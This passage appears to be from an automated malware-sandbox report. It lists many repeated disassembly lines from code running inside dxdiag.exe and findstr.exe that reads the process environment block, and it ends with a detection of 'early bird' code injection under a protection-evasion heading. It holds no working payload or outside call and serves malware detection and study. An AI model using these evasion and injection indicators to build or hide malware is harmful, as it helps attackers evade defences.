              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAA0E3 mov ecx, dword ptr fs:[00000030h]25_2_23AAA0E3
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAC0F0 mov eax, dword ptr fs:[00000030h]25_2_23AAC0F0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AF20F0 mov ecx, dword ptr fs:[00000030h]25_2_23AF20F0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B850D9 mov eax, dword ptr fs:[00000030h]25_2_23B850D9
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC70C0 mov eax, dword ptr fs:[00000030h]25_2_23AC70C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC70C0 mov ecx, dword ptr fs:[00000030h]25_2_23AC70C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC70C0 mov ecx, dword ptr fs:[00000030h]25_2_23AC70C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC70C0 mov eax, dword ptr fs:[00000030h]25_2_23AC70C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC70C0 mov ecx, dword ptr fs:[00000030h]25_2_23AC70C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC70C0 mov ecx, dword ptr fs:[00000030h]25_2_23AC70C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC70C0 mov eax, dword ptr fs:[00000030h]25_2_23AC70C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC70C0 mov eax, dword ptr fs:[00000030h]25_2_23AC70C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC70C0 mov eax, dword ptr fs:[00000030h]25_2_23AC70C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC70C0 mov eax, dword ptr fs:[00000030h]25_2_23AC70C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC70C0 mov eax, dword ptr fs:[00000030h]25_2_23AC70C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC70C0 mov eax, dword ptr fs:[00000030h]25_2_23AC70C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC70C0 mov eax, dword ptr fs:[00000030h]25_2_23AC70C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC70C0 mov eax, dword ptr fs:[00000030h]25_2_23AC70C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC70C0 mov eax, dword ptr fs:[00000030h]25_2_23AC70C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC70C0 mov eax, dword ptr fs:[00000030h]25_2_23AC70C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC70C0 mov eax, dword ptr fs:[00000030h]25_2_23AC70C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC70C0 mov eax, dword ptr fs:[00000030h]25_2_23AC70C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B320DE mov eax, dword ptr fs:[00000030h]25_2_23B320DE
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AD90DB mov eax, dword ptr fs:[00000030h]25_2_23AD90DB
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B7903E mov eax, dword ptr fs:[00000030h]25_2_23B7903E
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B7903E mov eax, dword ptr fs:[00000030h]25_2_23B7903E
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B7903E mov eax, dword ptr fs:[00000030h]25_2_23B7903E
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B7903E mov eax, dword ptr fs:[00000030h]25_2_23B7903E
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAA020 mov eax, dword ptr fs:[00000030h]25_2_23AAA020
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAC020 mov eax, dword ptr fs:[00000030h]25_2_23AAC020
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23ACE016 mov eax, dword ptr fs:[00000030h]25_2_23ACE016
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23ACE016 mov eax, dword ptr fs:[00000030h]25_2_23ACE016
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23ACE016 mov eax, dword ptr fs:[00000030h]25_2_23ACE016
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23ACE016 mov eax, dword ptr fs:[00000030h]25_2_23ACE016
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B85060 mov eax, dword ptr fs:[00000030h]25_2_23B85060
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC1070 mov eax, dword ptr fs:[00000030h]25_2_23AC1070
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC1070 mov ecx, dword ptr fs:[00000030h]25_2_23AC1070
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC1070 mov eax, dword ptr fs:[00000030h]25_2_23AC1070
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC1070 mov eax, dword ptr fs:[00000030h]25_2_23AC1070
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC1070 mov eax, dword ptr fs:[00000030h]25_2_23AC1070
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC1070 mov eax, dword ptr fs:[00000030h]25_2_23AC1070
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC1070 mov eax, dword ptr fs:[00000030h]25_2_23AC1070
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC1070 mov eax, dword ptr fs:[00000030h]25_2_23AC1070
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC1070 mov eax, dword ptr fs:[00000030h]25_2_23AC1070
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC1070 mov eax, dword ptr fs:[00000030h]25_2_23AC1070
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC1070 mov eax, dword ptr fs:[00000030h]25_2_23AC1070
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC1070 mov eax, dword ptr fs:[00000030h]25_2_23AC1070
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC1070 mov eax, dword ptr fs:[00000030h]25_2_23AC1070
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23ADC073 mov eax, dword ptr fs:[00000030h]25_2_23ADC073
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B5705E mov ebx, dword ptr fs:[00000030h]25_2_23B5705E
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B5705E mov eax, dword ptr fs:[00000030h]25_2_23B5705E
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AB2050 mov eax, dword ptr fs:[00000030h]25_2_23AB2050
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23ADB052 mov eax, dword ptr fs:[00000030h]25_2_23ADB052
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AB07AF mov eax, dword ptr fs:[00000030h]25_2_23AB07AF
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B837B6 mov eax, dword ptr fs:[00000030h]25_2_23B837B6
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAF7BA mov eax, dword ptr fs:[00000030h]25_2_23AAF7BA
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAF7BA mov eax, dword ptr fs:[00000030h]25_2_23AAF7BA
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAF7BA mov eax, dword ptr fs:[00000030h]25_2_23AAF7BA
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAF7BA mov eax, dword ptr fs:[00000030h]25_2_23AAF7BA
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAF7BA mov eax, dword ptr fs:[00000030h]25_2_23AAF7BA
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAF7BA mov eax, dword ptr fs:[00000030h]25_2_23AAF7BA
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAF7BA mov eax, dword ptr fs:[00000030h]25_2_23AAF7BA
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAF7BA mov eax, dword ptr fs:[00000030h]25_2_23AAF7BA
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAF7BA mov eax, dword ptr fs:[00000030h]25_2_23AAF7BA
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B397A9 mov eax, dword ptr fs:[00000030h]25_2_23B397A9
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B3F7AF mov eax, dword ptr fs:[00000030h]25_2_23B3F7AF
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B3F7AF mov eax, dword ptr fs:[00000030h]25_2_23B3F7AF
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B3F7AF mov eax, dword ptr fs:[00000030h]25_2_23B3F7AF
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B3F7AF mov eax, dword ptr fs:[00000030h]25_2_23B3F7AF
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B3F7AF mov eax, dword ptr fs:[00000030h]25_2_23B3F7AF
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23ADD7B0 mov eax, dword ptr fs:[00000030h]25_2_23ADD7B0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0319C310 mov ecx, dword ptr fs:[00000030h]30_2_0319C310
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0326132D mov eax, dword ptr fs:[00000030h]30_2_0326132D
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0326132D mov eax, dword ptr fs:[00000030h]30_2_0326132D
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031C0310 mov ecx, dword ptr fs:[00000030h]30_2_031C0310
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031DA30B mov eax, dword ptr fs:[00000030h]30_2_031DA30B
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031DA30B mov eax, dword ptr fs:[00000030h]30_2_031DA30B
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031DA30B mov eax, dword ptr fs:[00000030h]30_2_031DA30B
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03197330 mov eax, dword ptr fs:[00000030h]30_2_03197330
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0322930B mov eax, dword ptr fs:[00000030h]30_2_0322930B
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0322930B mov eax, dword ptr fs:[00000030h]30_2_0322930B
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0322930B mov eax, dword ptr fs:[00000030h]30_2_0322930B
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031CF32A mov eax, dword ptr fs:[00000030h]30_2_031CF32A
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0325F367 mov eax, dword ptr fs:[00000030h]30_2_0325F367
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03199353 mov eax, dword ptr fs:[00000030h]30_2_03199353
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03199353 mov eax, dword ptr fs:[00000030h]30_2_03199353
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0319D34C mov eax, dword ptr fs:[00000030h]30_2_0319D34C
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0319D34C mov eax, dword ptr fs:[00000030h]30_2_0319D34C
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0324437C mov eax, dword ptr fs:[00000030h]30_2_0324437C
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03275341 mov eax, dword ptr fs:[00000030h]30_2_03275341
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031A7370 mov eax, dword ptr fs:[00000030h]30_2_031A7370
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031A7370 mov eax, dword ptr fs:[00000030h]30_2_031A7370
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031A7370 mov eax, dword ptr fs:[00000030h]30_2_031A7370
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03222349 mov eax, dword ptr fs:[00000030h]30_2_03222349
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03222349 mov eax, dword ptr fs:[00000030h]30_2_03222349
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03222349 mov eax, dword ptr fs:[00000030h]30_2_03222349
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03222349 mov eax, dword ptr fs:[00000030h]30_2_03222349
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03222349 mov eax, dword ptr fs:[00000030h]30_2_03222349
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03222349 mov eax, dword ptr fs:[00000030h]30_2_03222349
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03222349 mov eax, dword ptr fs:[00000030h]30_2_03222349
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03222349 mov eax, dword ptr fs:[00000030h]30_2_03222349
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03222349 mov eax, dword ptr fs:[00000030h]30_2_03222349
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03222349 mov eax, dword ptr fs:[00000030h]30_2_03222349
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03222349 mov eax, dword ptr fs:[00000030h]30_2_03222349
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03222349 mov eax, dword ptr fs:[00000030h]30_2_03222349
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03222349 mov eax, dword ptr fs:[00000030h]30_2_03222349
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03222349 mov eax, dword ptr fs:[00000030h]30_2_03222349
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03222349 mov eax, dword ptr fs:[00000030h]30_2_03222349
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0326A352 mov eax, dword ptr fs:[00000030h]30_2_0326A352
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0322035C mov eax, dword ptr fs:[00000030h]30_2_0322035C
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0322035C mov eax, dword ptr fs:[00000030h]30_2_0322035C
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0322035C mov eax, dword ptr fs:[00000030h]30_2_0322035C
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0322035C mov ecx, dword ptr fs:[00000030h]30_2_0322035C
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0322035C mov eax, dword ptr fs:[00000030h]30_2_0322035C
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0322035C mov eax, dword ptr fs:[00000030h]30_2_0322035C
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031F739A mov eax, dword ptr fs:[00000030h]30_2_031F739A
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031F739A mov eax, dword ptr fs:[00000030h]30_2_031F739A
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03198397 mov eax, dword ptr fs:[00000030h]30_2_03198397
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03198397 mov eax, dword ptr fs:[00000030h]30_2_03198397
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03198397 mov eax, dword ptr fs:[00000030h]30_2_03198397
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0319E388 mov eax, dword ptr fs:[00000030h]30_2_0319E388
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0319E388 mov eax, dword ptr fs:[00000030h]30_2_0319E388
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0319E388 mov eax, dword ptr fs:[00000030h]30_2_0319E388
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031C438F mov eax, dword ptr fs:[00000030h]30_2_031C438F
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031C438F mov eax, dword ptr fs:[00000030h]30_2_031C438F
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031C33A5 mov eax, dword ptr fs:[00000030h]30_2_031C33A5
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0327539D mov eax, dword ptr fs:[00000030h]30_2_0327539D
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031D33A0 mov eax, dword ptr fs:[00000030h]30_2_031D33A0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031D33A0 mov eax, dword ptr fs:[00000030h]30_2_031D33A0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0325F3E6 mov eax, dword ptr fs:[00000030h]30_2_0325F3E6
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031AA3C0 mov eax, dword ptr fs:[00000030h]30_2_031AA3C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031AA3C0 mov eax, dword ptr fs:[00000030h]30_2_031AA3C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031AA3C0 mov eax, dword ptr fs:[00000030h]30_2_031AA3C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031AA3C0 mov eax, dword ptr fs:[00000030h]30_2_031AA3C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031AA3C0 mov eax, dword ptr fs:[00000030h]30_2_031AA3C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031AA3C0 mov eax, dword ptr fs:[00000030h]30_2_031AA3C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031A83C0 mov eax, dword ptr fs:[00000030h]30_2_031A83C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031A83C0 mov eax, dword ptr fs:[00000030h]30_2_031A83C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031A83C0 mov eax, dword ptr fs:[00000030h]30_2_031A83C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031A83C0 mov eax, dword ptr fs:[00000030h]30_2_031A83C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_032753FC mov eax, dword ptr fs:[00000030h]30_2_032753FC
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031D63FF mov eax, dword ptr fs:[00000030h]30_2_031D63FF
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0325C3CD mov eax, dword ptr fs:[00000030h]30_2_0325C3CD
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031BE3F0 mov eax, dword ptr fs:[00000030h]30_2_031BE3F0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031BE3F0 mov eax, dword ptr fs:[00000030h]30_2_031BE3F0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031BE3F0 mov eax, dword ptr fs:[00000030h]30_2_031BE3F0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031B03E9 mov eax, dword ptr fs:[00000030h]30_2_031B03E9
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031B03E9 mov eax, dword ptr fs:[00000030h]30_2_031B03E9
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031B03E9 mov eax, dword ptr fs:[00000030h]30_2_031B03E9
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031B03E9 mov eax, dword ptr fs:[00000030h]30_2_031B03E9
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031B03E9 mov eax, dword ptr fs:[00000030h]30_2_031B03E9
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031B03E9 mov eax, dword ptr fs:[00000030h]30_2_031B03E9
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031B03E9 mov eax, dword ptr fs:[00000030h]30_2_031B03E9
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031B03E9 mov eax, dword ptr fs:[00000030h]30_2_031B03E9
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0325B3D0 mov ecx, dword ptr fs:[00000030h]30_2_0325B3D0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03275227 mov eax, dword ptr fs:[00000030h]30_2_03275227
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031D7208 mov eax, dword ptr fs:[00000030h]30_2_031D7208
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031D7208 mov eax, dword ptr fs:[00000030h]30_2_031D7208
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0319823B mov eax, dword ptr fs:[00000030h]30_2_0319823B
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031A6259 mov eax, dword ptr fs:[00000030h]30_2_031A6259
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0319A250 mov eax, dword ptr fs:[00000030h]30_2_0319A250
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0326D26B mov eax, dword ptr fs:[00000030h]30_2_0326D26B
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0326D26B mov eax, dword ptr fs:[00000030h]30_2_0326D26B
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031D724D mov eax, dword ptr fs:[00000030h]30_2_031D724D
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03250274 mov eax, dword ptr fs:[00000030h]30_2_03250274
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03250274 mov eax, dword ptr fs:[00000030h]30_2_03250274
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03250274 mov eax, dword ptr fs:[00000030h]30_2_03250274
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03250274 mov eax, dword ptr fs:[00000030h]30_2_03250274
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03250274 mov eax, dword ptr fs:[00000030h]30_2_03250274
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03250274 mov eax, dword ptr fs:[00000030h]30_2_03250274
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03250274 mov eax, dword ptr fs:[00000030h]30_2_03250274
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03250274 mov eax, dword ptr fs:[00000030h]30_2_03250274
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03250274 mov eax, dword ptr fs:[00000030h]30_2_03250274
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03250274 mov eax, dword ptr fs:[00000030h]30_2_03250274
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03250274 mov eax, dword ptr fs:[00000030h]30_2_03250274
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03250274 mov eax, dword ptr fs:[00000030h]30_2_03250274
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03199240 mov eax, dword ptr fs:[00000030h]30_2_03199240
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03199240 mov eax, dword ptr fs:[00000030h]30_2_03199240
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031C9274 mov eax, dword ptr fs:[00000030h]30_2_031C9274
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E1270 mov eax, dword ptr fs:[00000030h]30_2_031E1270
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E1270 mov eax, dword ptr fs:[00000030h]30_2_031E1270
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0319826B mov eax, dword ptr fs:[00000030h]30_2_0319826B
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0325B256 mov eax, dword ptr fs:[00000030h]30_2_0325B256
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0325B256 mov eax, dword ptr fs:[00000030h]30_2_0325B256
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031A4260 mov eax, dword ptr fs:[00000030h]30_2_031A4260
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031A4260 mov eax, dword ptr fs:[00000030h]30_2_031A4260
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031A4260 mov eax, dword ptr fs:[00000030h]30_2_031A4260
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_032692A6 mov eax, dword ptr fs:[00000030h]30_2_032692A6
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_032692A6 mov eax, dword ptr fs:[00000030h]30_2_032692A6
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_032692A6 mov eax, dword ptr fs:[00000030h]30_2_032692A6
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_032692A6 mov eax, dword ptr fs:[00000030h]30_2_032692A6
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031D329E mov eax, dword ptr fs:[00000030h]30_2_031D329E
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031D329E mov eax, dword ptr fs:[00000030h]30_2_031D329E
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_032372A0 mov eax, dword ptr fs:[00000030h]30_2_032372A0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_032372A0 mov eax, dword ptr fs:[00000030h]30_2_032372A0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_032362A0 mov eax, dword ptr fs:[00000030h]30_2_032362A0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_032362A0 mov ecx, dword ptr fs:[00000030h]30_2_032362A0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_032362A0 mov eax, dword ptr fs:[00000030h]30_2_032362A0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_032362A0 mov eax, dword ptr fs:[00000030h]30_2_032362A0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_032362A0 mov eax, dword ptr fs:[00000030h]30_2_032362A0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_032362A0 mov eax, dword ptr fs:[00000030h]30_2_032362A0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031DE284 mov eax, dword ptr fs:[00000030h]30_2_031DE284
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031DE284 mov eax, dword ptr fs:[00000030h]30_2_031DE284
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_032292BC mov eax, dword ptr fs:[00000030h]30_2_032292BC
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_032292BC mov eax, dword ptr fs:[00000030h]30_2_032292BC
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_032292BC mov ecx, dword ptr fs:[00000030h]30_2_032292BC
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_032292BC mov ecx, dword ptr fs:[00000030h]30_2_032292BC
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03220283 mov eax, dword ptr fs:[00000030h]30_2_03220283
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03220283 mov eax, dword ptr fs:[00000030h]30_2_03220283
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03220283 mov eax, dword ptr fs:[00000030h]30_2_03220283
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03275283 mov eax, dword ptr fs:[00000030h]30_2_03275283
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031B02A0 mov eax, dword ptr fs:[00000030h]30_2_031B02A0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031B02A0 mov eax, dword ptr fs:[00000030h]30_2_031B02A0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031B52A0 mov eax, dword ptr fs:[00000030h]30_2_031B52A0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031B52A0 mov eax, dword ptr fs:[00000030h]30_2_031B52A0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031B52A0 mov eax, dword ptr fs:[00000030h]30_2_031B52A0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031B52A0 mov eax, dword ptr fs:[00000030h]30_2_031B52A0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_032752E2 mov eax, dword ptr fs:[00000030h]30_2_032752E2
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_032512ED mov eax, dword ptr fs:[00000030h]30_2_032512ED
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_032512ED mov eax, dword ptr fs:[00000030h]30_2_032512ED

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Early bird code injection technique detected
